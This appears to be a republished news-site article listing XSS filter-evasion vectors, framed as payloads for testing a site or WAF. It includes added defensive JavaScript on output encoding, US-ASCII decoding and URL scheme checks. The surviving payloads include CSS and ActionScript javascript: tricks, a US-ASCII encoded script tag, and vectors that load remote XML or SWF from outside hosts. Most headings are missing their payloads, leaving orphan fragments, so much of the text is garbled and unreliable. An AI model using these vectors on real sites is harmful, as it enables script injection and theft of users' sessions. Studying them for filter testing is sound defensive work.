2025-01-18 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
Today I would like to talk about how XSS protections get bypassed, a topic many people know little about. To make it easier to understand, the material is summarised below; I hope you get something out of it.
What follows is a series of XSS attack strings that can be used to get past XSS defence filters. Filtering input is not, by itself, a defence against XSS. You can use these payloads to test a website's resistance to XSS attacks; a WAF product should block every one of them.
How an XSS attack works:
An attacker places carefully constructed malicious HTML (usually carrying script) into a website that has an XSS vulnerability; when a user browses the page, the code runs automatically in that user's browser and the attacker achieves their goal.
XSS attacks are usually divided into non-persistent and persistent, with three delivery mechanisms:
Reflected: the malicious HTML is carried in the request URL and echoed straight back in the response.
DOM-based: client-side code passes attacker-controlled data into a DOM API (innerHTML, document.write, location and so on), so the page injects the malicious HTML into itself.
Stored (persistent): the attacker submits malicious code that is saved in the back-end database; every user who later opens the page receives it from the server.
Defences:
On the front end, data is escaped (output-encoded) for the context it is written into, and inputs are filtered.
On the back end, defence mainly relies on a WAF: regular-expression rules, OWASP rule sets (such as the Core Rule Set), semantic analysis of XSS payloads and machine-learned payload features.
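The following is an added example, not code from the original article: the output-encoding defence that the payloads on this page are written to get around, shown next to the kind of input blocklist they beat. The function names are my own and the sample payloads are constructed for the demo.

```javascript
// Added example, not code from the original article: context-aware output
// encoding versus a single-pass input blocklist. Function names are my own;
// the sample payloads are constructed in the style of the vectors below.

// Escape a value for an HTML text node or a double-quoted attribute value.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Escape a value for a JavaScript string literal: every non-alphanumeric
// character becomes \xHH (or \u{HHHH} above Latin-1), so neither quotes nor
// a literal </script> can terminate the string or the script block.
function encodeJsString(value) {
  let out = '';
  for (const ch of String(value)) {
    const cp = ch.codePointAt(0);
    if (/^[A-Za-z0-9]$/.test(ch)) out += ch;
    else if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// A typical "filter the input" defence: strip <script> and </script> tags
// in one pass. Filters like this are what the vectors below slip past.
function naiveStripScript(input) {
  return String(input).replace(/<\/?script[^>]*>/gi, '');
}

// Render an attacker-controlled name into three output contexts, each with
// the encoder for that context.
function render(name) {
  return {
    text: `<p>Hello, ${encodeHtml(name)}</p>`,
    attribute: `<input value="${encodeHtml(name)}">`,
    script: `<script>var who = "${encodeJsString(name)}";</script>`,
  };
}

// Constructed sample payloads (not captured from any real site).
const SAMPLE_PAYLOADS = [
  `<IMG SRC="javascript:alert('XSS')">`,
  `" onerror="alert(1)`,
  `</script><script>alert(1)</script>`,
  `<scr<script>ipt>alert(1)</scr</script>ipt>`, // nested tag survives one pass of the blocklist
];

// For each payload: what the blocklist leaves behind versus what the
// encoders emit.
function compare() {
  return SAMPLE_PAYLOADS.map((p) => ({
    payload: p,
    afterNaiveStrip: naiveStripScript(p),
    rendered: render(p),
  }));
}

console.log(JSON.stringify(compare(), null, 2));
```

The nested payload comes out of naiveStripScript() as a clean <script> tag, while every encoded output keeps the same characters as inert text; that is the difference between filtering input and encoding output.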
Normal XSS JavaScript injection:
The simplest form is likely to be filtered, but it is worth trying first (modern browsers do not require quotes around attribute values, so they are omitted here).
A polyglot XSS payload that executes in several contexts at once, including HTML, a script string, JavaScript and a URL:
javascript:/*-->
IMG SRC using the javascript: directive (note: IE7.0 does not honour the javascript: directive in the image context, but does in other contexts):
Without quotes or semicolons:
Mixed-case XSS payload:
HTML entities (the semicolons are required):
Using both double and single quotes: grave accents (backticks) can be used to delimit the JavaScript string, because many cross-site scripting filters do not know about them:
Malformed A tag: skips the HREF attribute entirely and puts the event handler first:
Xxs link
Chrome likes to replace missing quotes for you; if you get stuck, just leave them off and Chrome will put them in the right place and fix the missing quotes on the URL or script.
Xxs link
Malformed IMG tag: this uses the browser's relaxed parsing to build the XSS vector inside an IMG tag whose attribute should have been enclosed in quotes (presumably the leniency was meant to correct sloppy coding). It makes correctly parsing an HTML tag significantly harder:
fromCharCode: if no quotes of any kind are allowed, you can eval() a String.fromCharCode() call in JavaScript to build the XSS vector you need:
Default SRC tag to get past filters that check the SRC domain: this bypasses most SRC domain filters. Putting JavaScript in an event handler also works with any HTML tag that takes one, such as Form, Iframe, Input or Embed, and you can swap in any related event (onblur, onclick, ...), which gives many variations of the injections listed here:
Default SRC tag by leaving it empty:
Default SRC tag by leaving it out entirely:
On error alert:
IMG onerror with an encoded JavaScript alert:
Decimal HTML character references:
Spaces and metacharacters before the JavaScript in an IMG tag:
This is useful if the filter wrongly assumes there can be no whitespace between the quote and the "javascript:" keyword. In fact any character with decimal code 1 through 32 (the control characters and space) is accepted there.
Non-alphanumeric characters instead of whitespace:
Firefox's HTML parser treats a non-alphanumeric character after the tag name as invalid and ignores it, as if it were whitespace.
Some XSS filters assume the tags they are looking for are delimited by whitespace, so a tag name followed by such a character instead of a space slips past them.
Firefox assumes it is safe to close the HTML tag and adds the closing tag for you.
Protocol resolution in SCRIPT tags:
If you add the tags at the end, this works in Opera, and in Netscape in IE rendering-engine mode.
Half-open HTML/JavaScript XSS vector:
Unlike Firefox, the IE rendering engine does not add extra data to the page, but it does allow the javascript: directive inside an image.
The tag does not need to be closed with an angle bracket: assuming there is any HTML tag below the injection point, that tag closes the vector for you even though no ">" was supplied.
Remote stylesheet (variant 4):
This only works in the Gecko rendering engine, by binding a XUL file to the parent page with -moz-binding. It is ironic that Netscape considers Gecko the more secure engine, yet it is vulnerable on most websites.
BODY {-moz-binding: url("http://xss.rocks/xssmoz.xml#xss")}
STYLE tag with broken-up JavaScript:
This XSS sometimes sends IE into an infinite loop of alerts.
@im\port'\ja\vasc\ript:alert("XSS")'
STYLE attribute using a comment to break up the expression:
IMG STYLE with expression:
This is really a mix of the above XSS vectors, but it shows how hard it is to parse STYLE apart correctly, and as mentioned above it can send IE into a loop.
Exp/*
STYLE tag (older versions of Netscape only):
alert('XSS')
STYLE tag using background-image:
.XSS {background-image:url("javascript:alert('XSS')");}
STYLE tag using background:
BODY {background:url("javascript:alert('XSS')")}
Anonymous HTML tag with STYLE attribute:
IE6 and Netscape 8.1+ in IE rendering-engine mode do not really care whether the HTML tag you make up exists, as long as it starts with an open angle bracket followed by a letter.
Local .htc file:
This is slightly different from the two cross-site scripting vectors above because it uses an .htc file, which must be on the same server as the XSS vector.
The example file works by pulling in the JavaScript and running it as part of the style attribute.
US-ASCII encoding:
This uses malformed ASCII encoding, 7 bits instead of 8: a byte with the high bit set is read as the ASCII character with the same low 7 bits, so ¼ (byte 0xBC) becomes < (0x3C). This XSS can bypass many content filters,
but it only works if the host transmits in US-ASCII encoding or you set the encoding yourself.
It is more useful for bypassing web application firewalls than server-side filters.
Apache Tomcat is the only known server that transmits in US-ASCII encoding.
¼script¾alert(¢XSS¢)¼/script¾
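The following is an added example, not code from the original article: it shows what the US-ASCII vector above turns into once a 7-bit decoder drops the high bit of every byte, and how such a vector is produced from a plain payload. The payload string is the page's; the function names are my own.

```javascript
// Added example, not code from the original article. The vector is the one
// given above, written with its Latin-1 characters: ¼ is byte 0xBC, ¾ is
// 0xBE and ¢ is 0xA2. Function names are my own.
const US_ASCII_VECTOR = '\u00BCscript\u00BEalert(\u00A2XSS\u00A2)\u00BC/script\u00BE';

// Interpret a Latin-1 string the way a US-ASCII (7-bit) decoder does: keep
// only the low 7 bits of each byte (0xBC & 0x7F = 0x3C = '<').
function decodeAsUsAscii(latin1) {
  let out = '';
  for (let i = 0; i < latin1.length; i++) {
    const code = latin1.charCodeAt(i);
    if (code > 0xff) throw new RangeError(`not a single byte at index ${i}`);
    out += String.fromCharCode(code & 0x7f);
  }
  return out;
}

// Build such a vector from a plain payload: set bit 7 on each character a
// filter is likely to match on, so the raw bytes contain no '<', '>' or '"'.
function hideFromFilter(plain, chars = '<>"') {
  let out = '';
  for (const ch of plain) {
    const code = ch.charCodeAt(0);
    out += chars.includes(ch) ? String.fromCharCode(code | 0x80) : ch;
  }
  return out;
}

// A filter that inspects the raw bytes for a script tag.
function rawHasScriptTag(s) {
  return /<\/?script/i.test(s);
}

function demo() {
  return {
    rawMatches: rawHasScriptTag(US_ASCII_VECTOR),                         // false
    decoded: decodeAsUsAscii(US_ASCII_VECTOR),                            // <script>alert("XSS")</script>
    decodedMatches: rawHasScriptTag(decodeAsUsAscii(US_ASCII_VECTOR)),    // true
    roundTrip: hideFromFilter('<script>alert("XSS")</script>') === US_ASCII_VECTOR, // true
  };
}

console.log(demo());
```

A filter that decodes the body the same way the browser will (here, as US-ASCII) sees the tag; one that pattern-matches the raw bytes does not.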
META refresh:
The strange thing about META refresh is that it does not send a Referer header, so it can be used for attacks where the referring URL must not appear.
META using the data: URL scheme:
This is a good one because it contains nothing that obviously looks like a script or a JavaScript directive, since the payload is base64 encoded.
See RFC 2397 for the details of data: URLs. Any base64 encoder can produce the payload from raw HTML or JavaScript.
META with an additional URL parameter:
Useful if the target site checks whether the URL begins with "http://".
IFRAME:
If iframes are allowed there are a lot of other XSS problems as well.
IFRAME, event based:
IFRAMEs and most other elements can use event-based mayhem like the following.
FRAME:
Frames have the same sorts of XSS problems as iframes.
TABLE:
TD:
Just like the above, TD is vulnerable to a BACKGROUND attribute containing a JavaScript XSS vector.
DIV:
DIV background-image:
DIV background-image with a Unicode-encoded XSS exploit:
This has been slightly modified to obfuscate the url parameter.
DIV background-image plus extra characters:
Any of the following characters are allowed after the opening parenthesis and before the JavaScript directive in IE, and in Netscape 8.1 in secure site mode. They are listed in decimal, but of course hex and zero padding can be used too.
The allowed characters are: 1-32, 34, 39, 160, 8192-8203, 12288, 65279.
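The following is an added example, not code from the original article: a URL scheme check that survives the tricks described for IMG SRC earlier (spaces and metacharacters before javascript:, decimal and hex character references with or without semicolons, mixed case) and the wider character list just given for url() in IE and Netscape 8.1. The character-code lists are the page's; the function names and the sample vectors are my own.

```javascript
// Added example, not code from the original article. Function names and
// sample vectors are my own; the skipped-character lists are the page's.

// Characters the page says the browsers skip before or inside the scheme:
// decimal 1-32 for IMG SRC, plus 34, 39, 160, 8192-8203, 12288 and 65279
// inside CSS url() for IE and Netscape 8.1.
function isSkippedCode(cp) {
  return (cp >= 1 && cp <= 32) || cp === 34 || cp === 39 || cp === 160 ||
    (cp >= 8192 && cp <= 8203) || cp === 12288 || cp === 65279;
}

// Decode numeric character references, with or without the trailing
// semicolon and with any amount of zero padding (&#106; &#0000106 &#x6A).
function decodeNumericRefs(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?/gi, (m, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Return the scheme the browser will act on, lower-cased, or null when the
// URL has no scheme (relative).
function effectiveScheme(url) {
  let cleaned = '';
  for (const ch of decodeNumericRefs(String(url))) {
    if (!isSkippedCode(ch.codePointAt(0))) cleaned += ch;
  }
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// The check many filters actually implement: a case-sensitive substring
// test on the raw value, which even the mixed-case vector defeats.
function naiveIsJavascriptUrl(url) {
  return String(url).startsWith('javascript:');
}

// Allow only http(s) or relative URLs in an href/src.
function isAllowedUrl(url) {
  const scheme = effectiveScheme(url);
  return scheme === null || scheme === 'http' || scheme === 'https';
}

// Constructed vectors following the descriptions on this page.
const VECTORS = [
  "javascript:alert('XSS')",                  // plain
  "JaVaScRiPt:alert('XSS')",                  // mixed case
  "jav\tascript:alert('XSS')",                // embedded tab
  "jav&#x09;ascript:alert('XSS')",            // encoded tab
  " &#14;  javascript:alert('XSS')",          // spaces and metacharacters first
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",   // decimal refs
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", // zero-padded, no semicolons
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74('XSS')", // hex refs, no semicolons
  "\u3000javascript:alert('XSS')",            // ideographic space (12288) first
  "http://example.com/page",                  // benign
  "/images/image.jpg",                        // relative
];

function report() {
  return VECTORS.map((v) => ({
    url: v,
    naive: naiveIsJavascriptUrl(v),
    scheme: effectiveScheme(v),
    allowed: isAllowedUrl(v),
  }));
}

console.table(report());
```

Of the eleven constructed vectors, the naive substring test flags only the plain one; effectiveScheme() resolves all nine javascript: variants to the same scheme and lets only the http and relative URLs through.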
DIV expression:
A variant of this worked against a real-world cross-site scripting filter when a newline was placed between the colon and "expression".
Downlevel-hidden block:
Only works in IE5.0 and later, and in Netscape 8.1 in IE rendering-engine mode. Some sites assume that anything inside a comment block is safe and does not need to be removed, which lets us inject a cross-site script.
Or the system may add comment tags around something in an attempt to make it harmless; as we can see, that may not work.
BASE tag:
Works in IE and in Netscape 8.1 in secure mode. You need the // to comment out the following characters so that there is no JavaScript error and the XSS tag renders.
This also relies on the site using dynamically placed images with relative paths such as "images/image.jpg" rather than full paths.
If the path has a leading slash, such as "/images/image.jpg", you can remove one slash from the vector (it works as long as two slashes remain to form the comment).
OBJECT tag:
If objects are allowed, you can also inject virus payloads to infect users, just as with the APPLET tag. The linked file is actually an HTML file that can contain your XSS.
EMBED tag with a Flash movie that contains XSS:
Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it mitigates this risk (thanks to Jonathan Vanasco for the info):
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
EMBED SVG, which can contain your XSS vector:
This example only works in Firefox, but in Firefox it is better than the vector above because it does not require the user to have Flash installed or enabled.
Using ActionScript inside Flash to obfuscate the XSS vector:
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
XML data island with CDATA obfuscation:
This XSS attack only works in IE and in Netscape 8.1 in IE rendering-engine mode.
© 2024 shulou.com SLNews company. All rights reserved.